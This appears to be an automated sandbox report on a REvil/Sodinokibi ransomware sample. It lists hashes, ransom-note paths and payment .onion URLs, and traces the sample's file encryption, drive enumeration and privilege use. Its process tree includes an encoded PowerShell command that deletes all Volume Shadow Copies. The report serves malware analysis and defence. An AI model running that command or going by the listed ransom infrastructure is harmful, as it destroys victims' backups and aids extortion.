Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2024 11:39
Behavioral task
behavioral1
Sample
f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll
Resource
win10v2004-20240802-en
General
-
Target
f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll
-
Size
164KB
-
MD5
f849f1a918db29de3d9b6973fdcf17f6
-
SHA1
1d132bd0089d393e0df8e2ba9c70d692cc69ddb3
-
SHA256
1d7ec7dfa37ab698e6c57ce2700d113c1e781d859e8fb7c7f1a5b5ee6e85d039
-
SHA512
9aaf82a0e96afdbbe968d0747557b6672cf0d20603d84fe3352893e4a8d7c0d7f770dac64676ab84c28f16788e6923cf7f98f59709b13bad8af724b37398ab35
-
SSDEEP
3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfpL35lc/:veoUeZR2TRCWQFftpla
Malware Config
Extracted
C:\Users\1r7k2i7-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9842704CC5EE1D32
http://decryptor.cc/9842704CC5EE1D32
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe -
Drops file in Program Files directory 33 IoCs
description ioc Process File opened for modification \??\c:\program files\CompressStep.potx rundll32.exe File opened for modification \??\c:\program files\DisconnectInitialize.jpe rundll32.exe File opened for modification \??\c:\program files\InitializeEnable.js rundll32.exe File opened for modification \??\c:\program files\InstallRequest.m4a rundll32.exe File opened for modification \??\c:\program files\NewComplete.vssx rundll32.exe File created \??\c:\program files\1r7k2i7-readme.txt rundll32.exe File opened for modification \??\c:\program files\NewPush.ttf rundll32.exe File opened for modification \??\c:\program files\ProtectApprove.mp2v rundll32.exe File opened for modification \??\c:\program files\ReceiveDebug.pptx rundll32.exe File opened for modification \??\c:\program files\CompleteTrace.M2TS rundll32.exe File opened for modification \??\c:\program files\ConvertToGroup.jpe rundll32.exe File opened for modification \??\c:\program files\ConvertToResume.mpp rundll32.exe File opened for modification \??\c:\program files\EditOptimize.m4a rundll32.exe File opened for modification \??\c:\program files\MeasureLock.txt rundll32.exe File opened for modification \??\c:\program files\PingAdd.dotx rundll32.exe File opened for modification \??\c:\program files\ApproveStart.wmf rundll32.exe File opened for modification \??\c:\program files\PingRead.dxf rundll32.exe File opened for modification \??\c:\program files\ResumeUnblock.gif rundll32.exe File created \??\c:\program files (x86)\1r7k2i7-readme.txt rundll32.exe File opened for modification \??\c:\program files\AddInitialize.vstx rundll32.exe File opened for modification \??\c:\program files\ProtectConfirm.asp rundll32.exe File opened for modification \??\c:\program files\UnlockImport.emf rundll32.exe File opened for modification \??\c:\program files\CompressExport.vssm rundll32.exe File opened for modification \??\c:\program files\InvokeOut.ini rundll32.exe File opened for modification \??\c:\program files\CheckpointConvertTo.mp2 rundll32.exe File opened for modification \??\c:\program files\DenyAssert.DVR rundll32.exe File opened for modification \??\c:\program files\GroupDismount.css rundll32.exe File opened for modification \??\c:\program files\MeasureConnect.dxf rundll32.exe File opened for modification \??\c:\program files\SkipPop.wvx rundll32.exe File opened for modification \??\c:\program files\ApproveResolve.ps1xml rundll32.exe File opened for modification \??\c:\program files\CloseReceive.wps rundll32.exe File opened for modification \??\c:\program files\RedoCompare.search-ms rundll32.exe File opened for modification \??\c:\program files\SkipDeny.asx rundll32.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 408 rundll32.exe 408 rundll32.exe 4692 powershell.exe 4692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 408 rundll32.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeBackupPrivilege 3736 vssvc.exe Token: SeRestorePrivilege 3736 vssvc.exe Token: SeAuditPrivilege 3736 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1140 wrote to memory of 408 1140 rundll32.exe 82 PID 1140 wrote to memory of 408 1140 rundll32.exe 82 PID 1140 wrote to memory of 408 1140 rundll32.exe 82 PID 408 wrote to memory of 4692 408 rundll32.exe 83 PID 408 wrote to memory of 4692 408 rundll32.exe 83 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f849f1a918db29de3d9b6973fdcf17f6_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2152
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5fc6f208c83b218e5efb211f81f09ef0c
SHA1aa469e87a9d64516e62766bbc462c20bb5fa30a0
SHA25670acb615032acb43d577fa3753dda4af26227c5cf8eabbc21de4d19d16536085
SHA512df39e01ecd5888695d4a2a758a59cd084639489287bfdc324baeb2efc78e96f2e5221119ef468789941268c30b0c909ff98560b5a12ccb4b74cb7d6e71857736
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82